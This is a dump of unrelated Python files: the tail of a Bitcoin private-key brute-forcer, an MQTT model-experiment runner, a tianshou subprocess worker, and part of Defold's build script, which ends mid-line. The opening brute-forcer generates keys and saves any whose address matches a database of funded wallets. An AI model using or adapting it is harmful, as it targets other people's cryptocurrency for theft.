assumed to have a balance and the wallet data is written to the hard drive. If the address is not in the database, then it is assumed to be empty and printed to the user. This is a fast and efficient query. Average Time: 0.0000026941 seconds """ if address in database: with open('plutus.txt', 'a') as file: file.write('hex private key: ' + str(private_key) + '\n' + 'public key: ' + str(public_key) + '\n' + 'address: ' + str(address) + '\n\n') #'WIF private key: ' + str(private_key_to_WIF(private_key)) + '\n' + else: print(str(address) + '\n' + 'public key: ' + str(public_key) + '\n' + 'address: ' + str(address) + '\n' + ' -> find ->' + str(database) + '\n\n') def private_key_to_WIF(private_key): """Convert the hex private key into Wallet Import Format for easier wallet importing. This function is only called if a wallet with a balance is found. Because that event is rare, this function is not significant to the main pipeline of the program and is not timed. """ var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify('80' + private_key)).hexdigest())).hexdigest() var = binascii.unhexlify('80' + private_key + var[0:8]) alphabet = chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' value = pad = 0; result = '' for i, c in enumerate(var[::-1]): value += 256**i * c while value >= len(alphabet): div, mod = divmod(value, len(alphabet)) result, value = chars[mod] + result, div result = chars[value] + result for c in var: if c == 0: pad += 1 else: break return chars[0] * pad + result def main(database): """Create the main pipeline by using an infinite loop to repeatedly call the functions, while utilizing multiprocessing from __main__. Because all the functions are relatively fast, it is better to combine them all into one process. """ while True: private_key = generate_private_key() # 0.0000061659 seconds public_key = private_key_to_public_key(private_key) # 0.0016401287 seconds address = public_key_to_address(public_key) # 0.0000801390 seconds if address != -1: process(private_key, public_key, address, database) # 0.0000026941 seconds # -------------------- # 0.0017291287 seconds if __name__ == '__main__': """Read the pickle file. """ infile = open(filename,'rb') database = pickle.load(infile) infile.close() # To verify the database size, remove the # from the line below #print('database size: ' + str(sum(len(i) for i in database))); quit() for cpu in range(multiprocessing.cpu_count()): multiprocessing.Process(target = main, args = (database, )).start()
experiment_mqtt.py
__package__ = "modelconductor" import threading import sys import logging import yaml import os import asyncio import concurrent.futures import json import time from datetime import datetime as dt from hbmqtt.broker import Broker from hbmqtt.client import MQTTClient, ConnectException from hbmqtt.errors import MQTTException from hbmqtt.mqtt.constants import QOS_0, QOS_1, QOS_2 from modelconductor.modelhandler import SklearnModelHandler, HistoricalModelHandler from .utils import Measurement from modelconductor.experiment import Experiment, ModelStatus from modelconductor.config import config_dir logger = logging.getLogger(__name__) formatter = "[%(asctime)s] :: %(levelname)s - %(message)s" logging.basicConfig(level=logging.INFO, format=formatter) class MqttExperiment(Experiment): def init_broker(self, loop): if sys.version_info[:2] < (3, 4): logger.fatal("Error: Python 3.4+ is required") sys.exit(-1) config_file = os.path.join(config_dir, 'default_broker.yaml') try: with open(config_file, 'r') as stream: config = yaml.full_load(stream) if hasattr(yaml, 'full_load') else yaml.load(stream) except yaml.YAMLError as exc: logger.error("Invalid config_file %s: %s" % (config_file, exc)) broker = Broker(config, loop=loop) return broker def init_subscriber(self, loop): config_file = os.path.join(config_dir, 'default_client.yaml') try: with open(config_file, 'r') as stream: config = yaml.full_load(stream) if hasattr(yaml, 'full_load') else yaml.load(stream) except yaml.YAMLError as exc: logger.error("Invalid config_file %s: %s" % (config_file, exc)) client = MQTTClient(client_id="mqtt_subscriber_exp", config=config, loop=loop) return client @Experiment._run def execute_model_loop(self): while True: print("waiting for buffer_equal_window") while not (self.model.status == ModelStatus.READY): time.sleep(0.1) print("continue from buffer_equal_window") result = self.model.step() print("result: ") print(result) if result is not None: result['TIMING_model_response_timestamp'] = time.time() self.log_row(result, self.model) @asyncio.coroutine def do_sub_historical(self, client, url): try: qos = QOS_1 yield from client.connect(uri=url) filters = [("topic_1", qos)] yield from client.subscribe(filters) self.model.spawn() self.model.buffer_equal_window = asyncio.Event() count = 0 with open(self.log_path + "_inputs", mode='w') as input_logger: while True: try: message = yield from client.deliver_message() count += 1 item = message.publish_packet.data data = json.loads(item.decode('utf-8')) data = Measurement(data) print(data) print(",".join(map(str, list(data.values()))), file=input_logger) input_logger.flush() data['TIMING_model_response_timestamp'] = 0 self.model.store(data) # res = self.model.step(data) # results.append(result) except MQTTException: logger.debug("Error reading packet") yield from client.disconnect() except KeyboardInterrupt: yield from client.disconnect() except ConnectException as ce: logger.fatal("connection to '%s' failed: %r" % (url, ce)) except asyncio.CancelledError as cae: logger.fatal("Publish canceled due to prvious error: %r" % cae) @asyncio.coroutine def do_sub(self, client, url): try: yield from client.connect(uri=url) qos = QOS_1 filters = [("topic_1", qos)] yield from client.subscribe(filters) self.model.spawn() count = 0 while True: try: message = yield from client.deliver_message() count += 1 item = message.publish_packet.data data = json.loads(item.decode('utf-8')) data = Measurement(data) print(data) data['TIMING_model_response_timestamp'] = 0 res = self.model.step(data) res['TIMING_model_response_timestamp'] = time.time() print("result: ") print(res) self.results.append(res) self.log_row(res, self.model) except MQTTException: logger.debug("Error reading packet") yield from client.disconnect() except KeyboardInterrupt: yield from client.disconnect() except ConnectException as ce: logger.fatal("connection to '%s' failed: %r" % (url, ce)) except asyncio.CancelledError as cae: logger.fatal("Publish canceled due to prvious error: %r" % cae) def init_model(self, idx_path, model_path): import pickle # load input variable names for the pretrained sklearn model with open(idx_path, 'rb') as f: idx = pickle.load(f) input_keys = idx target_keys = ["Left_NOx_pred"] control_keys = ["Left_NOx", "TIMING_client_request_timestamp", "TIMING_model_response_timestamp"] model = SklearnModelHandler(model_filename=model_path, input_keys=input_keys, target_keys=target_keys, control_keys=control_keys) return model def run(self, loop = None): if loop is None: loop = asyncio.get_event_loop() # broker = self.init_broker(loop=loop) client = self.init_subscriber(loop) try: # loop.run_until_complete(broker.start()) print("running execute_model_loop!") # loop = asyncio.get_running_loop() # with concurrent.futures.ThreadPoolExecutor() as pool: # loop.run_in_executor(pool, self.execute_model_loop) print(type(self.model)) # import pdb; pdb.set_trace() if isinstance(self.model, HistoricalModelHandler): model_runner = threading.Thread(target=self.execute_model_loop, daemon=True) model_runner.start() loop.run_until_complete(self.do_sub_historical(client, "mqtt://localhost")) else: loop.run_until_complete(self.do_sub(client, "mqtt://localhost")) loop.run_forever() except KeyboardInterrupt: pass # loop.run_until_complete(broker.shutdown()) if __name__ == "__main__": ex = MqttExperiment(logging=True) ex.model = ex.init_model(os.path.join("customexamples", "sklearnovertcp_nox_demo", "nox_idx.pickle"), \ os.path.join("customexamples", "sklearnovertcp_nox_demo", "nox_rfregressor.pickle")) headers = ["timestamp"] if ex.model.input_keys: headers += ex.model.input_keys if ex.model.target_keys: headers += ex.model.target_keys if ex.model.control_keys: headers += ex.model.control_keys ex.logger = ex.initiate_logging(headers=headers) ex.run()
subproc.py
import gym import time import ctypes import numpy as np from collections import OrderedDict from multiprocessing.context import Process from multiprocessing import Array, Pipe, connection from typing import Callable, Any, List, Tuple, Optional from tianshou.env.worker import EnvWorker from tianshou.env.utils import CloudpickleWrapper def _worker(parent, p, env_fn_wrapper, obs_bufs=None): def _encode_obs(obs, buffer): if isinstance(obs, np.ndarray): buffer.save(obs) elif isinstance(obs, tuple): for o, b in zip(obs, buffer): _encode_obs(o, b) elif isinstance(obs, dict): for k in obs.keys(): _encode_obs(obs[k], buffer[k]) return None parent.close() env = env_fn_wrapper.data() try: while True: try: cmd, data = p.recv() except EOFError: # the pipe has been closed p.close() break if cmd == 'step': obs, reward, done, info = env.step(data) if obs_bufs is not None: obs = _encode_obs(obs, obs_bufs) p.send((obs, reward, done, info)) elif cmd == 'reset': obs = env.reset() if obs_bufs is not None: obs = _encode_obs(obs, obs_bufs) p.send(obs) elif cmd == 'close': p.send(env.close()) p.close() break elif cmd == 'render': p.send(env.render(**data) if hasattr(env, 'render') else None) elif cmd == 'seed': p.send(env.seed(data) if hasattr(env, 'seed') else None) elif cmd == 'getattr': p.send(getattr(env, data) if hasattr(env, data) else None) else: p.close() raise NotImplementedError except KeyboardInterrupt: p.close() _NP_TO_CT = { np.bool: ctypes.c_bool, np.bool_: ctypes.c_bool, np.uint8: ctypes.c_uint8, np.uint16: ctypes.c_uint16, np.uint32: ctypes.c_uint32, np.uint64: ctypes.c_uint64, np.int8: ctypes.c_int8, np.int16: ctypes.c_int16, np.int32: ctypes.c_int32, np.int64: ctypes.c_int64, np.float32: ctypes.c_float, np.float64: ctypes.c_double, } class ShArray: """Wrapper of multiprocessing Array""" def __init__(self, dtype, shape): self.arr = Array(_NP_TO_CT[dtype.type], int(np.prod(shape))) self.dtype = dtype self.shape = shape def save(self, ndarray): assert isinstance(ndarray, np.ndarray) dst = self.arr.get_obj() dst_np = np.frombuffer(dst, dtype=self.dtype).reshape(self.shape) np.copyto(dst_np, ndarray) def get(self): return np.frombuffer(self.arr.get_obj(), dtype=self.dtype).reshape(self.shape) def _setup_buf(space): if isinstance(space, gym.spaces.Dict): assert isinstance(space.spaces, OrderedDict) buffer = {k: _setup_buf(v) for k, v in space.spaces.items()} elif isinstance(space, gym.spaces.Tuple): assert isinstance(space.spaces, tuple) buffer = tuple([_setup_buf(t) for t in space.spaces]) else: buffer = ShArray(space.dtype, space.shape) return buffer class SubprocEnvWorker(EnvWorker): """Subprocess worker used in SubprocVectorEnv and ShmemVectorEnv.""" def __init__(self, env_fn: Callable[[], gym.Env], share_memory=False) -> None: super().__init__(env_fn) self.parent_remote, self.child_remote = Pipe() self.share_memory = share_memory self.buffer = None if self.share_memory: dummy = env_fn() obs_space = dummy.observation_space dummy.close() del dummy self.buffer = _setup_buf(obs_space) args = (self.parent_remote, self.child_remote, CloudpickleWrapper(env_fn), self.buffer) self.process = Process(target=_worker, args=args, daemon=True) self.process.start() self.child_remote.close() def __getattr__(self, key: str) -> Any: self.parent_remote.send(['getattr', key]) return self.parent_remote.recv() def _decode_obs(self, isNone): def decode_obs(buffer): if isinstance(buffer, ShArray): return buffer.get() elif isinstance(buffer, tuple): return tuple([decode_obs(b) for b in buffer]) elif isinstance(buffer, dict): return {k: decode_obs(v) for k, v in buffer.items()} else: raise NotImplementedError return decode_obs(self.buffer) def reset(self) -> Any: self.parent_remote.send(['reset', None]) obs = self.parent_remote.recv() if self.share_memory: obs = self._decode_obs(obs) return obs @staticmethod def wait(workers: List['SubprocEnvWorker'], wait_num: int, timeout: Optional[float] = None) -> List['SubprocEnvWorker']: conns, ready_conns = [x.parent_remote for x in workers], [] remain_conns = conns t1 = time.time() while len(remain_conns) > 0 and len(ready_conns) < wait_num: if timeout: remain_time = timeout - (time.time() - t1) if remain_time <= 0: break else: remain_time = timeout # connection.wait hangs if the list is empty new_ready_conns = connection.wait( remain_conns, timeout=remain_time) ready_conns.extend(new_ready_conns) remain_conns = [conn for conn in remain_conns if conn not in ready_conns] return [workers[conns.index(con)] for con in ready_conns] def send_action(self, action: np.ndarray) -> None: self.parent_remote.send(['step', action]) def get_result(self) -> Tuple[ np.ndarray, np.ndarray, np.ndarray, np.ndarray]: obs, rew, done, info = self.parent_remote.recv() if self.share_memory: obs = self._decode_obs(obs) return obs, rew, done, info def seed(self, seed: Optional[int] = None) -> List[int]: self.parent_remote.send(['seed', seed]) return self.parent_remote.recv() def render(self, **kwargs) -> Any: self.parent_remote.send(['render', kwargs]) return self.parent_remote.recv() def close_env(self) -> None: try: self.parent_remote.send(['close', None]) # mp may be deleted so it may raise AttributeError self.parent_remote.recv() self.process.join() except (BrokenPipeError, EOFError, AttributeError): pass # ensure the subproc is terminated self.process.terminate()
build.py
#!/usr/bin/env python # Copyright 2020 The Defold Foundation # Licensed under the Defold License version 1.0 (the "License"); you may not use # this file except in compliance with the License. # # You may obtain a copy of the License, together with FAQs at # https://www.defold.com/license # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # add build_tools folder to the import search path import sys, os from os.path import join, dirname, basename, relpath, expanduser, normpath, abspath sys.path.append(os.path.join(normpath(join(dirname(abspath(__file__)), '..')), "build_tools")) import shutil, zipfile, re, itertools, json, platform, math, mimetypes import optparse, subprocess, urllib, urlparse, tempfile, time import imp import github import run import s3 import release_to_github import BuildUtility import http_cache from tarfile import TarFile from glob import glob from threading import Thread, Event from Queue import Queue from ConfigParser import ConfigParser BASE_PLATFORMS = [ 'x86_64-linux', 'x86_64-darwin', 'win32', 'x86_64-win32', 'x86_64-ios', 'armv7-darwin', 'arm64-darwin', 'armv7-android', 'arm64-android', 'js-web', 'wasm-web'] try: sys.path.insert(0, os.path.dirname(__file__)) sys.dont_write_bytecode = True import build_private except Exception, e: class build_private(object): @classmethod def get_target_platforms(cls): return [] @classmethod def get_install_host_packages(cls, platform): # Returns the packages that should be installed for the host return [] @classmethod def get_install_target_packages(cls, platform): # Returns the packages that should be installed for the host return [] @classmethod def install_sdk(cls, configuration, platform): # Installs the sdk for the private platform pass @classmethod def is_library_supported(cls, platform, library): return True finally: sys.dont_write_bytecode = False def get_target_platforms(): return BASE_PLATFORMS + build_private.get_target_platforms() PACKAGES_ALL="protobuf-2.3.0 waf-1.5.9 junit-4.6 protobuf-java-2.3.0 openal-1.1 maven-3.0.1 ant-1.9.3 vecmath vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8 PVRTexLib-4.18.0 webp-0.5.0 defold-robot-0.7.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a jctest-0.6 c-ares-1.16.1 vulkan-1.1.108".split() PACKAGES_HOST="protobuf-2.3.0 cg-3.1 vpx-1.7.0 webp-0.5.0 luajit-2.1.0-beta3 tremolo-0.0.8".split() PACKAGES_EGGS="protobuf-2.3.0-py2.5.egg pyglet-1.1.3-py2.5.egg gdata-2.0.6-py2.6.egg Jinja2-2.6-py2.6.egg Markdown-2.6.7-py2.7.egg".split() PACKAGES_IOS_X86_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split() PACKAGES_IOS="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split() PACKAGES_IOS_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1 MoltenVK-1.0.41".split() PACKAGES_DARWIN="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 vpx-1.7.0".split() PACKAGES_DARWIN_64="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 vpx-1.7.0 tremolo-0.0.8 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 MoltenVK-1.0.41".split() PACKAGES_WIN32="webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 bullet-2.77 c-ares-1.16.1 vulkan-1.1.108".split() PACKAGES_WIN32_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split() PACKAGES_LINUX_64="PVRTexLib-4.18.0 webp-0.5.0 luajit-2.1.0-beta3 sassc-5472db213ec223a67482df2226622be372921847 apkc-0.1.0 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 c-ares-1.16.1 vulkan-1.1.108".split() PACKAGES_ANDROID="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split() PACKAGES_ANDROID_64="protobuf-2.3.0 android-support-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2 c-ares-1.16.1".split() PACKAGES_EMSCRIPTEN="protobuf-2.3.0 bullet-2.77".split() PACKAGES_NODE_MODULES="xhr2-0.1.0".split() DMSDK_PACKAGES_ALL="vectormathlibrary-r1649".split() CDN_PACKAGES_URL=os.environ.get("DM_PACKAGES_URL", None) CDN_UPLOAD_URL="s3://d.defold.com/archive" PACKAGES_IOS_SDK="iPhoneOS14.0.sdk" PACKAGES_IOS_SIMULATOR_SDK="iPhoneSimulator14.0.sdk" PACKAGES_MACOS_SDK="MacOSX10.15.sdk" PACKAGES_XCODE_TOOLCHAIN="XcodeDefault12.1.xctoolchain" PACKAGES_TAPI_VERSION="tapi1.6" WINDOWS_SDK_10_VERSION="10.0.18362.0" WINDOWS_MSVC_2019_VERSION="14.25.28610" PACKAGES_WIN32_TOOLCHAIN="Microsoft-Visual-Studio-2019-{0}".format(WINDOWS_MSVC_2019_VERSION) PACKAGES_WIN32_SDK_10="WindowsKits-{0}".format(WINDOWS_SDK_10_VERSION) PACKAGES_NODE_MODULE_XHR2="xhr2-v0.1.0" PACKAGES_ANDROID_NDK="android-ndk-r20" PACKAGES_ANDROID_SDK="android-sdk" PACKAGES_LINUX_CLANG="clang-9.0.0" PACKAGES_LINUX_TOOLCHAIN="clang+llvm-9.0.0-x86_64-linux-gnu-ubuntu-16.04" PACKAGES_CCTOOLS_PORT="cctools-port-darwin19-6c438753d2252274678d3e0839270045698c159b-linux" NODE_MODULE_LIB_DIR = os.path.join("ext", "lib", "node_modules") EMSCRIPTEN_VERSION_STR = "2.0.11" EMSCRIPTEN_SDK = "sdk-{0}-64bit".format(EMSCRIPTEN_VERSION_STR) PACKAGES_EMSCRIPTEN_SDK="emsdk-{0}".format(EMSCRIPTEN_VERSION_STR) SHELL = os.environ.get('SHELL', 'bash') ENGINE_LIBS = "testmain ddf particle glfw graphics lua hid input physics resource extension script render rig gameobject gui sound liveupdate crash gamesys tools record iap push iac webview profiler facebook engine sdk".split() EXTERNAL_LIBS = "bullet3d".split() def is_64bit_machine(): return platform.machine().endswith('64') # Legacy format, should be removed eventually # Returns: [linux|x86_64-linux|win32|x86_64-win32|darwin] def get_host_platform(): if sys.platform == 'linux2': arch = platform.architecture()[0] if arch == '64bit': return 'x86_64-linux' else: return 'linux' elif sys.platform == 'win32' and is_64bit_machine(): return 'x86_64-win32' else: return sys.platform # The difference from get_host_platform is that it returns the correct platform # Returns: [x86|x86_64][win32|linux|darwin] def get_host_platform2(): if sys.platform == 'linux2': arch = platform.architecture()[0] if arch == '64bit': return 'x86_64-linux' else: return 'x86-linux' elif sys.platform == 'win32': if is_64bit_machine(): return 'x86_64-win32' else: return 'x86-win32' elif sys.platform == 'darwin': if is_64bit_machine(): return 'x86_64-darwin' else: return 'x86-darwin' else: raise Exception("Unknown host platform: %s" % sys.platform) def format_exes(name, platform): prefix = '' suffix = [''] if 'win32' in platform: suffix = ['.exe'] elif 'android' in platform: prefix = 'lib' suffix = ['.so'] elif 'js-web' in platform: prefix = '' suffix = ['.js'] elif 'wasm-web' in platform: prefix = '' suffix = ['.js', '.wasm'] elif platform in ['arm64-nx64']: prefix = '' suffix = ['.nss', '.nso'] else: suffix = [''] exes = [] for suff in suffix: exes.append('%s%s%s' % (prefix, name, suff)) return exes # return '%s%s%s' % (prefix, name, suffix) def format_lib(name, platform): prefix = 'lib' suffix = '' if 'darwin' in platform or 'ios' in platform: suffix = '.dylib' elif 'win32' in platform: prefix = '' suffix = '.dll' else: suffix = '.so' return '%s%s%s' % (prefix, name, suffix) class ThreadPool(object): def __init__(self, worker_count): self.workers = [] self.work_queue = Queue() for i in range(worker_count): w = Thread(target = self.worker) w.setDaemon(True) w.start() self.workers.append(w) def worker(self): func, args, future = self.work_queue.get() while func: try: result = func(*args) future.result = result except Exception,e: future.result = e future.event.set() func, args, future = self.work_queue.get() class Future(object): def __init__(self, pool, f, *args): self.result = None self.event = Event() pool.work_queue.put([f, args, self]) def __call__(self): try: # In order to respond to ctrl+c wait with timeout... while not self.event.is_set(): self.event.wait(0.1) except KeyboardInterrupt,e: sys.exit(0) if isinstance(self.result, Exception): raise self.result else: return self.result def download_sdk(conf, url, targetfolder, strip_components=1, force_extract=False, format='z'): if not os.path.exists(targetfolder) or force_extract: if not os.path.exists(os.path.dirname(targetfolder)): os.makedirs(os.path.dirname(targetfolder)) path = conf.get_local_or_remote_file(url) conf._extract_tgz_rename_folder(path, targetfolder, strip_components, format=format) else: print "SDK already installed:", targetfolder class Configuration(object): def __init__(self, dynamo_home = None, target_platform = None, skip_tests = False, skip_codesign = False, skip_docs = False, skip_builtins = False, skip_bob_light = False, disable_ccache = False, no_colors = False, archive_path = None, package_path = None, set_version = None, channel = None, engine_artifacts = None, waf_options = [], save_env_path = None, notarization_username = None, notarization_password = None, notarization_itc_provider = None, github_token = None, github_target_repo = None, github_sha1 = None, version = None, codesigning_identity = None, windows_cert = None, windows_cert_pass = None): if sys.platform == 'win32': home = os.environ['USERPROFILE'] else: home = os.environ['HOME'] self.dynamo_home = dynamo_home if dynamo_home else join(os.getcwd(), 'tmp', 'dynamo_home') self.ext = join(self.dynamo_home, 'ext') self.dmsdk = join(self.dynamo_home, 'sdk') self.defold = normpath(join(dirname(abspath(__file__)), '..')) self.defold_root = os.getcwd() self.host = get_host_platform() self.host2 = get_host_platform2() self.target_platform = target_platform self.build_utility = BuildUtility.BuildUtility(self.target_platform, self.host, self.dynamo_home) self.skip_tests = skip_tests self.skip_codesign = skip_codesign self.skip_docs = skip_docs self.skip_builtins = skip_builtins self.skip_bob_light = skip_bob_light self.disable_ccache = disable_ccache self.no_colors = no_colors self.archive_path = archive_path self.package_path = package_path self.set_version = set_version self.channel = channel self.engine_artifacts = engine_artifacts self.waf_options = waf_options self.save_env_path = save_env_path self.notarization_username = notarization_username self.notarization_password = notarization_password self.notarization_itc_provider = notarization_itc_provider self.github_token = github_token self.github_target_repo = github_target_repo self.github_sha1 = github_sha1 self.version = version self.codesigning_identity = codesigning_identity self.windows_cert = windows_cert self.windows_cert_pass = windows_cert_pass if self.github_token is None: self.github_token = os.environ.get("GITHUB_TOKEN") self.thread_pool = None self.futures = [] if version is None: with open('VERSION', 'r') as f: self.version = f.readlines()[0].strip() self._create_common_dirs() def __del__(self): if len(self.futures) > 0: print('ERROR: Pending futures (%d)' % len(self.futures)) os._exit(5) def _create_common_dirs(self): for p in ['ext/lib/python', 'share', 'lib/js-web/js', 'lib/wasm-web/js']: self._mkdirs(join(self.dynamo_home, p)) def _mkdirs(self, path): if not os.path.exists(path): os.makedirs(path) def _log(self, msg): print msg sys.stdout.flush() sys.stderr.flush() def distclean(self): if os.path.exists(self.dynamo_home): self._log('Removing %s' % self.dynamo_home) shutil.rmtree(self.dynamo_home) for lib in ['dlib','texc']+ENGINE_LIBS: builddir = join(self.defold_root, 'engine/%s/build' % lib) if os.path.exists(builddir): self._log('Removing %s' % builddir) shutil.rmtree(builddir) # Recreate dirs self._create_common_dirs() self._log('distclean done.') def _extract_tgz(self, file, path): self._log('Extracting %s to %s' % (file, path)) version = sys.version_info suffix = os.path.splitext(file)[1] # Avoid a bug in python 2.7 (fixed in 2.7.2) related to not being able to remove symlinks: http://bugs.python.org/issue10761 if self.host == 'x86_64-linux' and version[0] == 2 and version[1] == 7 and version[2] < 2: fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'} run.env_command(self._form_env(), ['tar', 'xf%s' % fmts.get(suffix, 'z'), file], cwd = path) else: fmts = {'.gz': 'gz', '.xz': 'xz', '.bzip2': 'bz2'} tf = TarFile.open(file, 'r:%s' % fmts.get(suffix, 'gz')) tf.extractall(path) tf.close() def _extract_tgz_rename_folder(self, src, target_folder, strip_components=1, format=None): src = src.replace('\\', '/') force_local = '' if os.environ.get('GITHUB_SHA', None) is not None and os.environ.get('TERM', '') == 'cygwin': force_local = '--force-local' # to make tar not try to "connect" because it found a colon in the source file self._log('Extracting %s to %s/' % (src, target_folder)) parentdir, dirname = os.path.split(target_folder) old_dir = os.getcwd() os.chdir(parentdir) if not os.path.exists(dirname): os.makedirs(dirname) if format is None: suffix = os.path.splitext(src)[1] fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'} format = fmts.get(suffix, 'z') cmd = ['tar', 'xf%s' % format, src, '-C', dirname] if strip_components: cmd.extend(['--strip-components', '%d' % strip_components]) if force_local: cmd.append(force_local) run.env_command(self._form_env(), cmd) os.chdir(old_dir) def _extract_zip(self, file, path): self._log('Extracting %s to %s' % (file, path)) zf = zipfile.ZipFile(file, 'r') zf.extractall(path) zf.close() def _extract(self, file, path): if os.path.splitext(file)[1] == '.zip': self._extract_zip(file, path) else: self._extract_tgz(file, path) def _copy(self, src, dst): self._log('Copying %s -> %s' % (src, dst)) shutil.copy(src, dst) def _copy_tree(self, src, dst): self._log('Copying %s -> %s' % (src, dst)) shutil.copytree(src, dst) def _download(self, url): self._log('Downloading %s' % (url)) path = http_cache.download(url, lambda count, total: self._log('Downloading %s %.2f%%' % (url, 100 * count / float(total)))) if not path: self._log('Downloading %s failed' % (url)) return path def install_go(self): urls = { 'x86_64-darwin': 'https://storage.googleapis.com/golang/go1.7.1.darwin-amd64.tar.gz', 'x86_64-linux' : 'https://storage.googleapis.com/golang/go1.7.1.linux-amd64.tar.gz', 'win32' : 'https://storage.googleapis.com/golang/go1.7.1.windows-386.zip', 'x86_64-win32' : 'https://storage.googleapis.com/golang/go1.7.1.windows-amd64.zip' } url = urls.get(self.target_platform) if url: path = self._download(url) target_path = join(self.ext, 'go', self.target_platform) self._extract(path, target_path) else: print("No go found for %s" % self.target_platform) def _check_package_path(self): if self.package_path is None: print("No package path provided. Use either --package-path option or DM_PACKAGES_URL environment variable") sys.exit(1) def install_ext(self): def make_package_path(root, platform, package): return join(root, 'packages', package) + '-%s.tar.gz' % platform def make_package_paths(root, platform, packages): return [make_package_path(root, platform, package) for package in packages] self._check_package_path() print("Installing common packages") for p in PACKAGES_ALL: self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.ext) for p in DMSDK_PACKAGES_ALL: self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.dmsdk) # TODO: Make sure the order of install does not affect the outcome! platform_packages = { 'win32': PACKAGES_WIN32, 'x86_64-win32': PACKAGES_WIN32_64, 'x86_64-linux': PACKAGES_LINUX_64, 'darwin': PACKAGES_DARWIN, # ?? Still used by bob-light? 'x86_64-darwin': PACKAGES_DARWIN_64, 'armv7-darwin': PACKAGES_IOS, 'arm64-darwin': PACKAGES_IOS_64, 'x86_64-ios': PACKAGES_IOS_X86_64, 'armv7-android': PACKAGES_ANDROID, 'arm64-android': PACKAGES_ANDROID_64, 'js-web': PACKAGES_EMSCRIPTEN, 'wasm-web': PACKAGES_EMSCRIPTEN } base_platforms = self.get_base_platforms() target_platform = self.target_platform other_platforms = set(platform_packages.keys()).difference(set(base_platforms), set([target_platform, self.host])) if target_platform in ['js-web', 'wasm-web']: node_modules_dir = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR) for package in PACKAGES_NODE_MODULES: path = join(self.defold_root, 'packages', package + '.tar.gz') name = package.split('-')[0] self._extract_tgz(path, join(node_modules_dir, name)) installed_packages = set() for platform in other_platforms: packages = platform_packages.get(platform, []) package_paths = make_package_paths(self.defold_root, platform, packages) print("Installing %s packages " % platform) for path in package_paths: self._extract_tgz(path, self.ext) installed_packages.update(package_paths) for base_platform in self.get_base_platforms(): packages = list(PACKAGES_HOST) + build_private.get_install_host_packages(base_platform) packages.extend(platform_packages.get(base_platform, [])) package_paths = make_package_paths(self.defold_root, base_platform, packages) package_paths = [path for path in package_paths if path not in installed_packages] if len(package_paths) != 0: print("Installing %s packages" % base_platform) for path in package_paths: self._extract_tgz(path, self.ext) installed_packages.update(package_paths) target_packages = platform_packages.get(self.target_platform, []) + build_private.get_install_target_packages(self.target_platform) target_package_paths = make_package_paths(self.defold_root, self.target_platform, target_packages) target_package_paths = [path for path in target_package_paths if path not in installed_packages] if len(target_package_paths) != 0: print("Installing %s packages" % self.target_platform) for path in target_package_paths: self._extract_tgz(path, self.ext) installed_packages.update(target_package_paths) print("Installing python eggs") run.env_command(self._form_env(), ['python', '-m', 'easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), 'pip']) run.env_command(self._form_env(), ['python', '-m', 'pip', '-q', '-q', 'install', '-t', join(self.ext, 'lib', 'python'), 'requests', 'pyaml']) for egg in glob(join(self.defold_root, 'packages', '*.egg')): self._log('Installing %s' % basename(egg)) run.env_command(self._form_env(), ['python', '-m', 'easy_install', '-q', '-d', join(self.ext, 'lib', 'python'), '-N', egg]) print("Installing javascripts") for n in 'js-web-pre.js'.split(): self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share')) for n in 'js-web-pre-engine.js'.split(): self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share')) print("Installing profiles etc") for n in itertools.chain(*[ glob('share/*%s' % ext) for ext in ['.mobileprovision', '.xcent', '.supp']]): self._copy(join(self.defold_root, n), join(self.dynamo_home, 'share')) # Simple way to reduce number of warnings in the build proto_path = os.path.join(self.dynamo_home, 'share', 'proto') if not os.path.exists(proto_path): os.makedirs(proto_path) # Note: This is a step we want to separate from install_ext # since it should actually be before install_ext (e.g. to build the extensions) self.install_sdk() def get_local_or_remote_file(self, path): if os.path.isdir(self.package_path): # is is a local path? if os.path.exists(path): return os.path.normpath(os.path.abspath(path)) print "Could not find local file:", path sys.exit(1) dirname, basename = os.path.split(path) path = dirname + "/" + urllib.quote(basename) path = self._download(path) # it should be an url if path is None: print("Error. Could not download %s" % path) sys.exit(1) return path def check_sdk(self): sdkfolder = join(self.ext, 'SDKs') folders = [] if self.target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'): folders.append(join(sdkfolder, PACKAGES_MACOS_SDK)) folders.append(join(sdkfolder, 